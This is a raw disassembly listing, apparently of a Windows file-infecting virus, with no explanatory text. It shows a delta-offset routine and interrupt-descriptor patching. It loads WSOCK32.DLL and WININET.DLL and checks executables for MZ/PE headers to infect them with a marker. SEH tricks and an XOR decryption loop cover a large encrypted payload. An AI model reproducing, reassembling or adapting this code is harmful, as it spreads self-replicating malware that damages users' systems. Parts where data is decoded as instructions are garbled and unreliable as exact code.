loc_40AE2F: ; CODE XREF: seg002:0040ADD7�j
and [edx], bh
pop edi
dec edx
dec edi
dec ecx
dec esi
and [esi], ah
jbe short near ptr loc_40AEA2+1
loc_40AE3A: ; CODE XREF: seg002:loc_40ADD4�j
jb short near ptr loc_40AEAF+1
jnz short near ptr loc_40AE45+3
push ebp
call $+5
pop ebp
loc_40AE45: ; CODE XREF: seg002:0040AE3C�j
sub ebp, offset loc_401C44
loc_40AE4B: ; CODE XREF: seg002:0040ADE5�j
; seg002:0040ADD9�j
mov byte ptr [ebp+401477h], 0
call dword ptr [ebp+40245Bh]
shr eax, 1Fh
jz short loc_40AE99
push 1Eh
mov esi, [ebp+40241Bh]
pop ecx
loc_40AE66: ; CODE XREF: seg002:loc_40AE95�j
lodsb
cmp al, 2Eh
loc_40AE69: ; CODE XREF: seg002:0040ADFF�j
jnz short loc_40AE95
cmp word ptr [esi], 1DFFh
loc_40AE70: ; CODE XREF: seg002:0040ADFC�j
jnz short loc_40AE95
lea edi, [ebp+4024FBh]
mov esi, [esi+2]
push edi
loc_40AE7C: ; CODE XREF: seg002:0040AE0D�j
movsd
movsw
loc_40AE7F: ; CODE XREF: seg002:0040AE18�j
lea eax, [ebp+40234Fh]
loc_40AE85: ; CODE XREF: seg002:0040AE0B�j
; seg002:0040AE1C�j
pop dword ptr [ebp+402375h]
cli
loc_40AE8C: ; CODE XREF: seg002:0040AE1A�j
mov [esi-6], eax
mov word ptr [esi-2], cs
sti
mov cl, 1
loc_40AE95: ; CODE XREF: seg002:loc_40AE69�j
; seg002:loc_40AE70�j
loop loc_40AE66
jmp short loc_40AEDC
; ---------------------------------------------------------------------------
loc_40AE99: ; CODE XREF: seg002:0040AE5B�j
lea eax, [ebp+40149Fh]
push eax
push 0
loc_40AEA2: ; CODE XREF: seg002:0040AE38�j
push 6
call dword ptr [ebp+40246Bh]
cmp dword ptr [esp+8], 4
loc_40AEAF: ; CODE XREF: seg002:loc_40AE3A�j
jnz short loc_40AEDC
call near ptr loc_40AEB9+1
push ebx
inc esi
inc ebx
loc_40AEB9: ; CODE XREF: seg002:0040AEB1�p
add bh, bh
xchg eax, ebp
dec edi
and al, 40h
add al, ch
dec esp
cld
; ---------------------------------------------------------------------------
db 0FFh
dd 7E8FFh, 46530000h, 534F5F43h, 4F95FF00h, 0E8004024h
dd 0FFFFFC35h
; ---------------------------------------------------------------------------
loc_40AEDC: ; CODE XREF: seg002:0040AE97�j
; seg002:loc_40AEAF�j
call sub_40A32A
dec dword ptr ss:loc_401262[ebp]
call near ptr loc_40AEF6+1
push ebp
push ebx
inc ebp
push edx
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_40AEF6: ; CODE XREF: seg002:0040AEE7�p
add bh, bh
xchg eax, ebp
arpl [eax+eax*2], sp
add al, ch
or al, [eax]
; ---------------------------------------------------------------------------
dd 73770000h, 6E697270h, 416674h, 1395FF50h, 89004024h
dd 40241F85h, 8D310F00h, 4017898Dh, 1858900h, 51004025h
dd 246395FFh, 68930040h, 4, 1796B58Dh, 8D590040h, 4024E7BDh
dd 0F746E800h, 0C766FFFFh, 401BF685h, 83F0FF00h, 401BF8A5h
dd 958D0000h, 401BB6h, 16A5450h, 6852006Ah, 80000002h
dd 24EB95FFh, 0C0850040h, 8D22755Ah, 401BE98Dh, 66A5200h
dd 1BF6B58Dh, 56540040h, 52515050h, 24EF95FFh, 0FF580040h
dd 4024E795h, 885C600h, 4027h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 6395FF00h, 93004024h, 768h, 0EDB58D00h, 59004016h
dd 24B7BD8Dh, 0C1E80040h, 0E8FFFFF6h, 0Ch, 494E4957h, 2E54454Eh
dd 4C4C44h, 246395FFh, 0C0850040h, 1E7840Fh, 68930000h
dd 5, 172BB58Dh, 8D590040h, 4024D3BDh, 0F68AE800h, 0BD83FFFFh
dd 4024D7h, 0C2840F00h, 81000001h, 190ECh, 1685400h, 0FF000001h
dd 4024B795h, 90C48100h, 50000001h, 6AD48Bh, 0D795FF52h
dd 85004024h, 0D7559C0h, 138868h, 8395FF00h, 0EB004024h
dd 0F8BD83E2h, 401Bh, 858D2975h, 401BFCh, 0C395FF50h, 85004024h
dd 3B840FC0h, 8B000001h, 8B0C40h, 858F30FFh, 401BF8h, 270885C6h
dd 6A010040h, 6A016A00h, 0CF95FF02h, 83004024h, 840FFFF8h
dd 112h, 0F4958D93h, 6A00401Bh, 0FF535210h, 4024BF95h
dd 0FC08500h, 0F285h, 16BD8D00h, 0B100401Ch, 0FAC0E808h
dd 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h, 40245Fh
dd 1C24BD8Dh, 1B10040h, 0FFFAA1E8h, 24448BFFh, 8E0C110h
dd 424440Bh, 0B08E0C1h, 50082444h, 5E8h, 362E2500h, 0FF570078h
dd 40241F95h, 0CC48300h, 200647C6h, 1C11958Dh, 6A0040h
dd 2168h, 0FF535200h, 4024CB95h, 247C8D00h, 95FF5714h
dd 402423h, 0A3804C6h, 50006A40h, 95FF5357h, 4024CBh, 0BD8DE603h
dd 401C32h, 0C68006Ah, 57000000h, 0CB95FF53h, 3D004024h
dd 0Ch, 0B58D4D75h, 402509h, 27088D8Dh, 0CE2B0040h, 5651006Ah
dd 0C795FF53h, 83004024h, 2F7E00F8h, 8DFE8B91h, 402509B5h
dd 0F20DB000h, 601075AEh, 0FFFAF7E8h, 177261FFh, 778D09E3h
dd 8BEAEB01h, 8DCE2BCFh, 402509BDh, 87A4F300h, 53B9EBF7h
dd 24BB95FFh, 0BD800040h, 401477h, 682A7401h, 7530h, 248395FFh
dd 0BD800040h, 402708h, 0C7117400h, 401BF885h, 0
dd 885C600h, 4027h, 0FFFE56E9h, 8085C7FFh, 4014h, 5D800000h
dd 8D0004C2h, 402709B5h, 95FF5600h, 402443h, 0FFFF883h
dd 0BB84h, 0D858900h, 6A004028h, 95FF5600h, 40247Bh, 840FC085h
dd 0A4h, 5050C02Bh, 6A50036Ah, 6801h, 0FF56C000h, 40242795h
dd 0FFF88300h, 2E4840Fh, 85890000h, 402811h, 28158D8Dh
dd 958D0040h, 40281Dh, 6A5251h, 4B95FF50h, 83004024h, 840FFFF8h
dd 2B2h, 0B5FF006Ah, 402811h, 244795FFh, 0F8830040h, 9B840FFFh
dd 89000002h, 40282585h, 3C93300h, 515051C3h, 0FF51046Ah
dd 402811B5h, 2B95FF00h, 85004024h, 77840FC0h, 33000002h
dd 298589C9h, 51004028h, 1F685151h, 50000F00h, 246795FFh
dd 0C0850040h, 230840Fh, 85890000h, 40282Dh, 384B8BC3h
dd 5838B8h, 3D23300h, 0F7F1F7C1h, 358589E1h, 8B004028h
dd 6B83C4Bh, 33000014h, 0F7C103D2h, 89E1F7F1h, 40283185h
dd 0B70FC300h, 0E3F9064Bh, 18538D36h, 1443B70Fh, 6B49D003h
dd 0D00328C1h, 775F3A81h, 74F96E69h, 7A83491Eh, 0DF72010Ch
dd 8B3C4B8Bh, 42031442h, 48448D10h, 23D9F7FFh, 25853BC1h
dd 0C3004028h, 24448B59h, 0B888890Ch, 33000000h, 0CF8BC3C0h
dd 0BD8D0BEBh, 402709h, 33DF8BFCh, 613CACC9h, 7A3C0672h
dd 202C0277h, 745C3CAAh, 742E3CECh, 75003CDDh, 8BC8E3E8h
dd 58453D01h, 0B740045h, 5243533Dh, 49850F00h, 8BFFFFFFh
dd 49573D03h, 840F434Eh, 0FFFFFF3Ch, 5543573Dh, 31840F4Eh
dd 3DFFFFFFh, 32334357h, 0FF26840Fh, 503DFFFFh, 0F4F5453h
dd 0FFFF1B84h, 0E8DB33FFh, 0FFFFFE43h, 0FF0E840Fh, 0D233FFFFh
dd 16E8h, 0FF6EE800h, 0E8FFFFh, 5D000000h, 21B3ED81h, 0F9E90040h
dd 64000000h, 0B58B32FFh, 40282Dh, 66228964h, 5A4D3E81h
dd 0E2850Fh, 5E8B0000h, 66DE033Ch, 45503B81h, 0D2850Fh
dd 43F70000h, 200016h, 0C5850F00h, 0F6000000h, 0F025C43h
dd 0BB84h, 207E8100h, 20202020h, 0AE840Fh, 0CFE80000h
dd 0FFFFFFEh, 0A382h, 0FE97E800h, 0A2E8FFFFh, 8B000000h
dd 4028319Dh, 0FDB5E800h, 840FFFFFh, 88h, 282DB58Bh, 5E8B0040h
dd 0E8DE033Ch, 0FFFFFE9Eh, 4A817672h, 6024h, 56FE8BE0h
dd 8D147A03h, 401000B5h, 107A0300h, 501B9h, 0A5F35700h
dd 2E303B1h, 5E5FA4F3h, 92310F52h, 155878Dh, 50880000h
dd 0EECBE8FFh, 8B5AFFFFh, 4A030C4Ah, 5418D10h, 8928432Bh
dd 46C71247h, 20202020h, 284B8920h, 8B104A8Bh, 40283185h
dd 84A3900h, 4A890373h, 10420108h, 586383h, 2835858Bh
dd 42010040h, 50430108h, 8B64D233h, 28F6422h, 11BD8358h
dd 4028h, 0FDE2840Fh, 0B5FFFFFFh, 40282Dh, 248795FFh, 0B5FF0040h
dd 402829h, 240795FFh, 8D8D0040h, 402815h, 281D958Dh, 52510040h
dd 0B5FF006Ah, 402811h, 247F95FFh, 0B5FF0040h, 402811h
dd 240795FFh, 0B58D0040h, 402709h, 280DB5FFh, 0FF560040h
dd 40247B95h, 11A58300h, 4028h, 0E8C3h, 6A5D0000h, 2EED8101h
dd 58004023h, 85C10FF0h, 401480h, 83C3C085h, 0FF0FFC8h
dd 148085C1h, 3DC30040h, 2A0010h, 81661C75h, 6C0C247Ch
dd 60137571h, 0FFFFC4E8h, 0E80575FFh, 0FFFFFDC2h, 0FFFFD2E8h
dd 0FF2E61FFh, 3456782Dh, 0AAE86012h, 75FFFFFFh, 24448B39h
dd 9B58D30h, 8B004027h, 81660850h, 7302063Ah, 685625h
dd 8B00FF00h, 52006AC4h, 0B395FF50h, 83004024h, 3E8108C4h
dd 5C3F3F5Ch, 0C6830375h, 0FD74E804h, 84E8FFFFh, 61FFFFFFh
dd 25B8h, 2FB8C300h, 0E8000000h, 10h, 0B80020C2h, 30h
dd 3E8h, 24C200h, 0C24548Dh, 0F8832ECDh, 60197C00h, 0E8h
dd 24548B00h, 1A8B5D30h, 23F1ED81h, 4E80040h, 61FFFFF4h
dd 470004C2h, 0AD7C809Bh, 317C8308h, 0A07C9103h, 7C80ADh
dd 2 dup(0)
dd 0B6000000h, 247C80BDh, 5C7C801Ah, 677C8094h, 2C7C8023h
dd 377C8104h, 0F7C8106h, 587C864Bh, 3C7C80C0h, 777C8115h
dd 457C810Ah, 0A17C831Ch, 0FF7C80B6h, 0CA7C8608h, 0DA7C835Dh
dd 0DE7C8111h, 777C812Ah, 57C801Dh, 767C80B9h, 0E17C80BBh
dd 0E57C8309h, 587C863Dh, 827C863Fh, 0B87C8127h, 427C831Ch
dd 747C8024h, 517C80B9h, 877C809Ah, 607C810Dh, 827C90D4h
dd 547C90D6h, 697C90D7h, 557C90D7h, 907C90DCh, 0B67C90DDh
dd 327C90DEh, 0C67C90EAh, 7C9130h, 52h dup(0)
; =============== S U B R O U T I N E =======================================
sub_40B800 proc near ; CODE XREF: seg002:0040B840�p
arg_18 = dword ptr 1Ch
; FUNCTION CHUNK AT 0040B86E SIZE 00000050 BYTES
; FUNCTION CHUNK AT 0040B8E1 SIZE 0000004A BYTES
pusha
push ebp
mov ebp, esp
call loc_40B81C
call sub_40B8BE
mov ebp, fs:0
sub ebp, 0FFFFFFF8h
jmp loc_40B86E
sub_40B800 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_40B81C: ; CODE XREF: sub_40B800+4�p
push dword ptr fs:0
mov fs:0, esp
xor eax, eax
push 100h
push eax
push eax
push 80000000h
push eax
push eax
push eax
push 80000000h
push eax
push eax
call sub_40B800
add [ecx], dh
fist dword ptr [ebx+68h]
add [eax], cl
; ---------------------------------------------------------------------------
dd 680000h, 68800000h, 8000h, 4068h, 685300h, 53800000h
dd 53535353h, 0A0A015FFh
db 40h, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40B800
loc_40B86E: ; CODE XREF: sub_40B800+17�j
sub eax, eax
loc_40B870: ; CODE XREF: sub_40B800+76�j
dec al
or al, al
jz short loc_40B87A
jnz short loc_40B870
jmp short loc_40B8E1
; ---------------------------------------------------------------------------
loc_40B87A: ; CODE XREF: sub_40B800+74�j
call $+5
pop edx
sub edx, 0FFFFFFB4h
push edx
sub edi, edi
xor edi, 243Ch
sub esi, esi
add esi, 0DFh
loc_40B897: ; CODE XREF: sub_40B800+A7�j
mov al, [edx]
xor ax, si
xchg al, [edx]
add edx, 1
sub edi, 1
cmp edi, 0
jnz short loc_40B897
pop edx
mov esp, fs:0
pop dword ptr fs:0
leave
mov [esp-8+arg_18], edx
popa
jmp edx
; END OF FUNCTION CHUNK FOR sub_40B800
; =============== S U B R O U T I N E =======================================
sub_40B8BE proc near ; CODE XREF: sub_40B800+9�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_40B8BE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 4Fh
dd 0DFDFDF37h, 0FBDB54DFh, 0FBF45F28h, 0DFDFDFDFh, 47565FDFh
db 73h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40B800
loc_40B8E1: ; CODE XREF: sub_40B800+78�j
neg bh
fist word ptr [ebx+eax*4-5]
fld tbyte ptr [ebx+568623F2h]
outsd
outsd
neg bh
fist word ptr [esi+67h]
imul esi, -21h
fistp word ptr [edi+67h]
lock sti
fstp9 st(7)
aaa
stosb
rcr ah, cl
inc edi
out dx, eax
sti
fstp9 st(7)
push esp
test bl, ch
and ah, ch
xor al, 0D7h
push esp
inc edi
out dx, al
sti
fstp9 st(7)
and ah, ch
test [edx-44CA1B6h], cl
fcmovnu st, st(2)
fstp9 st(7)
loc_40B920: ; CODE XREF: seg002:0040B933�j
fistp word ptr [esi+3Ch]
fild qword ptr [edi]
and [eax], ah
pop esi
xor bl, cl
iret
; END OF FUNCTION CHUNK FOR sub_40B800
; ---------------------------------------------------------------------------
db 9Fh
; ---------------------------------------------------------------------------
fist word ptr [ebx-5]
fist dword ptr [edx+6Ah]
jecxz short loc_40B920
lahf
fbld tbyte ptr [esi-21h]
fstp9 st(7)
fild qword ptr [ebx+edi*2]
pop esi
movsb
xchg eax, ecx
mov esi, [edi-2D55534Ah]
push esp
loc_40B948: ; CODE XREF: seg002:0040B96A�j
pushf
jecxz short loc_40B99D
fcmovnb st, st(7)
mov ecx, 9A8FE75Eh
stosd
xlat
pop esi
xor al, 0DFh
fcompp st(7), st
fild qword ptr [edx-5870ABC3h]
fmul qword ptr [esp+edx*2]
lodsd
call dword ptr [ebp+edx*4-39h]
fsubr qword ptr [esi+ecx*4]
jb short loc_40B948
sbb al, 5Eh
cmpsd
and bh, bl
cwde
mov edx, 5EC4AAABh
cmpsd
fmul qword ptr [edi-55434F53h]
; ---------------------------------------------------------------------------
dw 5ECDh
dd 0BB9ED8A7h, 0D6AAADBBh, 0BAD4A75Eh, 0ABDFACACh, 86083DDAh
dd 0D3F61C82h, 0FBAD54FBh
db 86h
; ---------------------------------------------------------------------------
loc_40B99D: ; CODE XREF: seg002:0040B949�j
fsubr qword ptr [eax+edx*8]
push 0A55491DBh
retn
; ---------------------------------------------------------------------------
fsub qword ptr [esp+edx*2]
jmp short loc_40BA03
; ---------------------------------------------------------------------------
db 0DCh
dd 0DFD3372Ch, 0B39CDFDFh, 97BAACB0h, 0B3BBB1BEh, 208CDFBAh
dd 0E35A5609h, 37DF9FEAh, 0DFDFDFD2h, 0BEBAAD9Ch, 0A99ABAABh
dd 9EABB1BAh, 9208CDFh, 0EA9F5A56h, 0D237DF9Fh, 98DFDFDFh
dd 0BE93ABBAh, 0AD9AABACh, 0DFADB0ADh, 5609208Ch, 9FEA9B5Ah
dd 0DFAF37DFh
; ---------------------------------------------------------------------------
fstp9 st(7)
pop edx
loc_40BA03: ; CODE XREF: seg002:0040B9A9�j
pop ds
stosd
dec byte ptr [edi-1564B5E0h]
lahf
fistp word ptr [edx+1Fh]
stosb
iret
; ---------------------------------------------------------------------------
db 52h, 5Ah, 0Dh
dd 55DF9FCEh, 0B137208Fh, 34DFDFDFh, 0E34A20A3h, 28DF9FEAh
dd 9FEBEE5Ah, 0DFDFDFDFh, 52C1AB5Fh, 9FEBEA6Ah, 0FBA354DFh
dd 547A7BDBh, 9FE66D42h, 696A54DFh, 54DF9FE6h, 9FE66562h
dd 851C82DFh, 2 dup(0DFB5DFB5h), 0DBDFDEB7h, 0B51B54DFh
dd 0D3B58FDFh, 3D201B54h, 0EC808B89h, 16ECDFDFh, 20200537h
dd 7E4A5220h, 8DDF9FCEh, 208F8E8Eh, 9FEA9F4Ah, 0FF1B5CDFh
dd 662D551Ch, 0DFDFFD80h, 0DD9FCFEFh, 1C263D09h, 0B2E41390h
dd 0F60514F6h, 0AF4DBD24h, 0FD8DDC2Bh, 4244688Ah, 439EA4F3h
dd 8A995C86h, 4FF7E548h, 972ED08Eh, 0D6258DBDh, 72F8AAB4h
dd 9E2FAE44h, 0F7B0C3EDh, 2635BDADh, 2C6EA675h, 0EEEE0FDEh
dd 0C708D11Fh, 3605A16Bh, 0EFB2ED6Ah, 77FE1CEBh, 77C99DE2h
dd 18E4E473h, 0CA1AF61Fh, 1B2233BBh, 52A105EBh, 19BA1CC2h
dd 0DA696C43h, 8A6AF78Bh, 61F24025h, 66A5C47Bh, 7AFC01DFh
dd 863D0CAEh, 0B2C17991h, 0E37AD409h, 3A09ADEFh, 7A029C6Eh
dd 7D2E9E5Eh, 4620A9E4h, 8159A827h, 0C4691514h, 7FA070BFh
dd 56A52443h, 82A6D8Ah, 7B9EBC8Bh, 0EB2A270h, 0CC098F73h
dd 3379FB1Fh, 34401956h, 59F250DFh, 0E14CE828h, 66CE2677h
dd 3E4EF47Ch, 57EEA0EEh, 869551E3h, 0CFB9ECF4h, 0ACD9E3FBh
dd 459E4F01h, 974F74E9h, 5AED382Fh, 1EAD948Bh, 0B78E80CEh
dd 0E67571C3h, 2EF6C8D2h, 9142329Eh, 5A1190B5h, 0F60154E3h
dd 520818CDh, 7FE78B67h, 250887Fh, 53EAA4F2h, 8A995DE7h
dd 4F9D2613h, 42340F3Fh, 3E65F4F6h, 9A297882h, 0A11368A2h
dd 3BB1AAF0h, 2C1F8E30h, 0DF85DD68h, 5F160C1Bh, 23C53DCh
dd 3645D416h, 43EDCE8h, 0B825E354h, 0C91206Fh, 4A19A067h
dd 428C57F7h, 3DD2C8Eh, 12F643CAh, 9B6CC703h, 9A5C687Ah
dd 0D26CD8Bh, 0A2F346A7h, 9E084713h, 2A79C8E2h, 103EC894h
dd 374AEFA0h, 76C5E1B7h, 0B548E8D8h, 0BE3EC96Eh, 6A54EBAFh
dd 0B9956446h, 8FD6E947h, 0CE5D9F19h, 0A7F9F534h, 261A3403h
dd 0F32C7706h, 556DFCF8h, 0A2049C02h, 59FCE753h, 0EF36C966h
dd 2E3DBF2Dh, 0DFCA277h, 0F878995Ch, 0F1899851h, 0C84DF6E4h
dd 0C6615F36h, 0ECD68530h, 1D602B37h, 1637EC51h, 0C7FE0572h
dd 8A9C74C3h, 0D1E93847h, 53A971DFh, 0DD8E7F31h, 0E2B8EFF5h
dd 0AAF9081Ah, 0E316AA1Bh, 0EA9498h, 5D63F807h, 0BAA3E345h
dd 7EE41203h, 689D6B2Fh, 0ACD12FF3h, 8AD900B7h, 0EF7247Bh
dd 1CCBA26Eh, 36F04B93h, 0C22938B2h, 36ADF8C8h, 62B1A9C1h
dd 261F5058h, 0AA53841Ch, 0AC970C31h, 1A81BA4Dh, 3645FDEDh
dd 9058588Dh, 2B324C54h, 42D1158Bh, 0F9D0BD6Ch, 373E2CF8h
dd 3B509344h, 52A1207Fh, 16AF80BAh, 298633C7h, 9EC0FD2Eh
dd 2FF1405Fh, 26A18896h, 0A79977D7h, 0AE25AC0Eh, 273E425Fh
dd 76C5E1FFh, 3A498ECFh, 916210EBh, 0D2A115C4h, 2FE34D01h
dd 6F3E8D5Bh, 0BB71CDADh, 0C22131DAh, 63ADA1BCh, 9F20F847h
dd 0DE2D8987h, 0C25B14DFh, 330AFB39h, 6AF9FDFBh, 5B224C5Eh
dd 0F06BC6A0h, 624E42F5h, 92DBD90Dh, 3E4D9C3Ah, 0A755C5BCh
dd 0D6B211D1h, 23EF4105h, 6B3A8957h, 479EE6FFh, 966541CFh
dd 0CBFFCCCh, 49FBAC5Dh, 17A11530h, 22B644D3h, 3F065F47h
dd 6EFDF927h, 302B90B5h, 0C375C11Ch, 927018E7h, 0E98DDC6Ah
dd 0ED80104h, 3942F0D7h, 0CAECC422h, 0CD6B1F7Bh, 5297CC9Ah
dd 8131B4C3h, 0AF99ED78h, 9E683C0Bh, 0E1F79C7Bh, 0C807802Dh
dd 0E21D3C68h, 84970C31h, 472945E0h, 0F6C09463h, 129A8493h
dd 0BECD1896h, 0A100E95Ch, 3AD0DD03h, 0BF19E8C1h, 201CED93h
dd 2E13072h, 47F3A457h, 253AE897h, 0DE18141Eh, 0FB31854Fh
dd 124ACB67h, 0AFF680F3h, 0EE7D7AA7h, 4D3CBCB7h, 0E37A879Ch
dd 3A09AD1Bh, 3A8CC400h, 82D16187h, 7A00DB24h, 0E359A802h
dd 31E2571Eh, 0CA213932h, 98E56C1Bh, 7FA9F82Eh, 0DF6DBCC6h
dd 0E231408Fh, 0A6F50453h, 3BB9C817h, 0BB82DF8Dh, 0F24165D7h
dd 32694D08h, 9872ADA7h, 7C115FC5h, 8C74D38Eh, 0E2B009D2h
dd 2FF34A38h, 522E9858h, 8D5383A8h, 0E2571DD5h, 29853832h
dd 7BC18E7Fh, 503280A1h, 834125F6h, 0CF956111h, 1CFECC5Ah
dd 5735F1BAh, 93693DA5h, 0CAB979EAh, 3FEAB202h, 6723A32Fh
dd 9670D092h, 0EFBA07C5h, 4EDC5F08h, 73C4827Ch, 0B337D1B7h
dd 0FF5D17EAh, 3B9F541Fh, 21B1A46Eh, 5214E1A1h, 98511CF2h
dd 0AE996D3Eh, 13E4A25Ch, 5911F157h, 9F613488h, 8CFE6CC7h
dd 32F04E3Ch, 723A8C40h, 0A361EDF7h, 0FCB538CFh, 5285511Ah
dd 73C99D45h, 0BF04D193h, 0E77E13DFh, 0CF94743Ch, 3D8AD47h
dd 5E1CCFD7h, 8B5125DDh, 0C0B5641Eh, 2F0B60Ah, 3A08EB42h
dd 0B87939ACh, 0D1B40CC6h, 46F05E1Ah, 4C2D8D70h, 9A78C092h
dd 92441DD6h, 1B915104h, 76DC9C68h, 0B00CF4AEh, 0A3542CEBh
dd 0D2904353h, 1AD4AD43h, 4B11E59Dh, 976C31D1h, 0D38214E2h
dd 17EC8C13h, 4A2CCC5Bh, 8511E187h, 0E38310D6h, 25F05B05h
dd 6B1AEC55h, 0A004E68Bh, 0F84A1DF0h, 5AA84002h, 7ACC9347h
dd 5013E983h, 0A74C36F2h, 0DA984557h, 19D8A54Dh, 5B07F690h
dd 0B905318Fh, 0FCA77DD7h, 33E8B002h, 6B21904Eh, 0C654C39Dh
dd 0E4BC18F8h, 2DF25E2Bh, 12D2835Ah, 0B50AC693h, 0A95A0BE2h
dd 2C847A79h, 32B1B47Ch, 4316EBA1h, 0D80A3BE4h, 0DA856915h
dd 6E4831Fh, 5329FD65h, 887D2CA6h, 0CAB87EC2h, 42D0530Ah
dd 40218160h, 9E7CC49Eh, 8EB801D2h, 37845C2Ch, 6FF6F473h
dd 0B70CCCB4h, 0FB4015DFh, 0CBB76F1Bh, 0FE1A17Fh, 7F79EDBAh
dd 9E5C21F5h, 0C5A47909h, 1FC3B22Ch, 6C49FD4Bh, 8B792E82h
dd 0EE900CCEh, 46F64B1Fh, 7E309A60h, 0A274EA9Eh, 0E66F70DAh
dd 238F5002h, 68F98C74h, 0B204CAA2h, 915427EAh, 0C39E6B07h
dd 1EF7C879h, 4F18FE98h, 9B4735EBh, 0F8C571CFh, 1FFB9B13h
dd 6E28E84Ah, 0A772CF9Dh, 0C8D517C0h, 2FEB6B03h, 5E38985Ah
dd 0B702DF8Dh, 0EE6007F0h, 199D7647h, 6ACC9979h, 4114D3AAh
dd 885A2DE7h, 0E78D4657h, 7EBBC7Ah, 540EE7BAh, 826631B0h
dd 0BAA777CEh, 0EC2A825h, 6B178E4Ah, 8815C19Fh, 0EFA927C3h
dd 21EF7C15h, 61D2955Ch, 0B30EDB97h, 0EE6778E9h, 2A824E1Bh
dd 34C5A36Ah, 5301F6BAh, 8F7424F6h, 0D78F6336h, 25F59E1Fh
dd 5331FD51h, 8E7B31B1h, 0F3A17DDEh, 30FE4D0Ah, 7207E44Ah
dd 0A377FD9Bh, 0EBB903D8h, 3B93442Ch, 79F1936Dh, 0B31AD686h
dd 0F75F08D8h, 0F5F16721h, 12E68540h, 5F0DFAB6h, 825E4CEBh
dd 0C1A46330h, 13EEB70Ch, 552A9853h, 9D683285h, 0E7B660DBh
dd 35FA4C07h, 64208A43h, 0CE78C19Ah, 0E44215CDh, 38804743h
dd 75DAF863h, 0AA08D7A8h, 965F098Fh, 0C39B7636h, 5D58B63h
dd 4F35E9A8h, 976D34F1h, 0C2AB5DA3h, 1FE7AA02h, 4A28DB5Fh
dd 0AC7FCFACh, 0E3A107D6h, 2BED7B13h, 475D894Fh, 0A004C491h
dd 0D95111EDh, 1B875D37h, 6AC3B50Bh, 471FF2AAh, 83450BE7h
dd 0C68B5D39h, 0F4CC5Ah, 5C33F5ABh, 93572086h, 0D38F7CC6h
dd 3F8DB907h, 5210B66Bh, 0E82797BAh, 8A9524F3h, 0DFA4929h
dd 77D29F53h, 0D61CD188h, 0D54E1DD5h, 1583593Bh, 1AF4B96Ah
dd 43278492h, 8F4C19F0h, 0CFAB7529h, 37E4A573h, 6445D55Bh
dd 9F5A3F82h, 0D2AC4ADFh, 3AD4451Ah, 0EFD6E472h, 9BD183F2h
dd 8EDD6CD3h, 76ADBD97h, 7CA59E00h, 8939E9C2h, 52A679E1h
dd 0F2258B1Fh, 37F5AE47h, 0BF86DB85h
dd 0EE7D796Bh, 4DCDD4DCh, 36B020F6h, 328D1B27h, 7B800B28h
dd 8291751Eh, 2CC5DB40h, 0F5578237h, 8E28086Eh, 9DE1F5BFh
dd 56E5A4C7h, 0D4C1A807h, 556DBCA2h, 69312A5Bh, 0CEB56E9Fh
dd 6AA9C817h, 442F8EB1h, 9BCF389Fh, 0B6AF14A3h, 85D98B36h
dd 7E7878BEh, 3D48FFEFh, 0C6E05826h, 3E66AD77h, 86D06767h
dd 3161F0EAh, 96B0F98Fh, 59E97857h, 0E1FEABDAh, 0F6F40B1Dh
dd 6B3504A6h, 0AADA9CD8h, 91E9241Bh, 0B7CA6F20h, 0F645610Bh
dd 9928972Ah, 3D65DC6Bh, 89AE1FD0h, 86207C76h, 6256E5B7h
dd 0A69D2C58h, 0ED5E0F0Dh, 0E3B93148h, 5AAC78C7h, 0D160373Fh
dd 62B1E3FAh, 0D98A993Bh, 0B5FEC368h, 0AE155998h, 2F81D01Fh
dd 2C5179A2h, 333A58A7h, 0A3639926h, 16C0202Fh, 5705B562h
dd 0A68C57A6h, 9DD2C8Eh, 0C71E147Bh, 16E5C13Fh, 0DA6D7A9Ah
dd 9E2D94DEh, 23AC004Fh, 26AF87FEh, 0A786E2D7h, 0AE27420Eh
dd 7F93405Fh, 5C85F043h, 368D1B27h, 0AA889B8Dh, 4FD120B5h
dd 1010E353h, 2E59A82Dh, 931D86FBh, 0F8201A7Ch, 0A9D6CB42h
dd 0F56FC74h, 2E197C4Eh, 0E2314BE7h, 0FD258F53h, 0E7859814h
dd 6E67FE6Eh, 0FEBBDB9Fh, 3DC514A2h, 7A88D0EDh, 15B59F2Bh
dd 99AC024h, 0F2B4C240h, 0BF7B6F72h, 0C9DE2ED0h, 6EAE7F0h
dd 0C6E9FFD0h, 0BA95213h, 0E1529659h, 6244705Ah, 0EAF1C793h
dd 9F8D9DDCh, 0B996CC5Bh, 0F5467A5Ch, 1E053EE4h, 0B99E91A7h
dd 2697B6A8h, 251E9C7h, 0A75729F3h, 0FF10961Dh, 0DBF4EF8Bh
dd 12E1C679h, 0DE6D30C6h, 0DCBCF1C5h, 0A9ED7C7Dh, 8AE403EDh
dd 267584D3h, 0E3D4C9CAh, 25FD4C40h, 32B79A82h, 12391723h
dd 7E0658EFh, 0BECD1C12h, 4099CCEEh, 6E01E433h, 0CA19A9F3h
dd 0BB4DF944h, 0AE6A303Fh, 1281708Eh, 8A69B8C6h, 9AC57CE1h
dd 0F4F1004Fh, 31B59041h, 1FF51D28h, 270E4CDBh, 0B3C587D2h
dd 27D4D463h, 50189A4Dh, 0FE0D34EAh, 7D8320AFh, 6A078E6h
dd 0FCDC7E37h, 9A4DF78Fh, 922074D7h, 0E21A6343h, 1AABD823h
dd 0F6F843CBh, 0BB3100B9h, 0B081C4D6h, 0E1E9DCF4h, 7C7DE60Fh
dd 0D5707CEh, 0F6F0D836h, 0BA0C8167h, 0C11B4C5Eh, 82249C7Ah
dd 0C282E9B3h, 0EF37F25h, 0ACA6163h, 7961B0FEh, 864FB4B0h
dd 0A42CB1Eh, 4EFDAC5Bh, 0DD23D09Fh, 0A6002006h, 0A23D8957h
dd 91BDCC19h, 0CD49B4ABh, 0B6334C76h, 2F364BA7h, 7ECDEA73h
dd 2552272h, 0B31F9A73h, 7522EB6h, 4EDD39FFh, 872CE9DCh
dd 0D625A4C3h, 657FA984h, 512DB899h, 62B0DF87h, 36F18BD3h
dd 6A394896h, 0BE883665h, 72BF5059h, 3744102Ch, 0C48958E7h
